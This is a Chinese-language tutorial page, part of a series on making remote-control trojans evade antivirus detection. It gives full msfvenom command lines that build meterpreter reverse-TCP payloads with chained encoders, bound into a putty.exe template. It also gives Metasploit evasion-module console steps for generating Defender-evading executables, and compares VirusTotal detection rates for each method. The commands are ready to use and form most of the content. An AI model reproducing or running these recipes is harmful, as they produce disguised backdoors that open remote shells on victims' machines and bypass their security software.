主页 > 网络知识 > 远控免杀从入门到实践(一):基础篇(6)

远控免杀从入门到实践(一):基础篇(6)

看来稍微组合一下是能过更多的杀软的。后面会介绍更多的免杀方法,自己可以尝试多种免杀进行组合,垒积木一样的感觉…

7.5 msfvenom多重编码(VT查杀率45/70)

操作便利★★★★

免杀效果★★

推荐指数★

详细文章链接:https://mp.weixin.qq.com/s/A0CZslLhCLOK_HgkHGcpEA

msfvenom的encoder编码器可以对payload进行一定程度免杀,同时还可以使用msfvenom多重编码功能,通过管道,让msfvenom用不同编码器反复编码进行混淆。

如下命令,使用管道让msfvenom对攻击载荷多重编码,先用shikata_ga_nai编码20次,接着来10次的alpha_upper编码,再来10次的countdown编码,最后才生成以putty.exe为模板的可执行文件。

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 20 LHOST=10.211.55.2 LPORT=3333 -f raw | msfvenom -e x86/alpha_upper -i 10 -f raw | msfvenom -e x86/countdown -i 10 -x putty.exe -f exe -o payload5.exe

 

image(6).png

 

还有这种更多重编码姿势

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp -e x86/call4_dword_xor -i 14 LHOST=192.168.74.133 LPORT=5110 -f raw | msfvenom -a x86 --platform windows -e x86/countdown -i 13 -f raw | msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -b "&" -i 4 -f raw | msfvenom -a x86 --platform windows -e cmd/powershell_base64 -i 10 -x putty.exe -k -f exe > payload6.exe

在virustotal.com上查杀率为45/70,编码多了,免杀率居然降低了。。。尴尬。。。

 

image(7).png

 

经过测试,发现使用的编码类型越多,免杀率可能会降低,猜测是因为各种编码引入了更多的特征码。同时生成的payload也很可能无法正常执行,这个也和被捆绑程序有一定关联。

7.6 Evasion模块免杀(VT免杀率12-71)

操作便利★★★

免杀效果★★★

推荐指数★★★

详细文章链接:https://mp.weixin.qq.com/s/YnnCM7W20xScv52k_ubxYQ

2019年1月,metasploit升级到了5.0,引入了一个新的模块叫Evasion模块,官方宣称这个模块可以创建反杀毒软件的木马。

evasion有以下几个模块,可以使用show evasion进行查看。

使用use windows/windows_defender_exe进行生成payload

msf5 > use windows/windows_defender_exe msf5 evasion(windows/windows_defender_exe) > set filename payload.exe msf5 evasion(windows/windows_defender_exe) > set payload windows/meterpreter/reverse_tcp msf5 evasion(windows/windows_defender_exe) > set LHOST 10.211.55.3 msf5 evasion(windows/windows_defender_exe) > set LPORT 3333 msf5 evasion(windows/windows_defender_exe) > run

经测试,可正常上线。virustotal.com中42/71个报毒。

 

image(8).png

 

还可以生成install_util(VT查杀率12/71)和hta(VT查杀率14/59)等,因为使用了白名单加载的方式,所以免杀效果相对好一些。

7.7 msf自编译+base64处理(VT免杀率33/69)

操作便利★★

免杀效果★★★

推荐指数★★★

详细文章链接:https://mp.weixin.qq.com/s/HsIqUKl7j1WJ4yyYzXdPZg

Metasploit Framework提供了C编译器,这其实是Metasm的包装器(Metasm是一个Ruby库),可用于汇编、反汇编和编译C代码。

使用改C编译器时,需要以下两个函数:

Metasploit::Framework::Compiler::Windows.compile_c(code) Metasploit::Framework::Compiler::Windows.compile_c_to_fle(fle_path, code)

操作略微复杂,详细过程可以参看https://mp.weixin.qq.com/s/HsIqUKl7j1WJ4yyYzXdPZg

最终生成的payloaf在virustotal.com中33/70个报毒

说点什么吧
  • 全部评论(0
    还没有评论,快来抢沙发吧!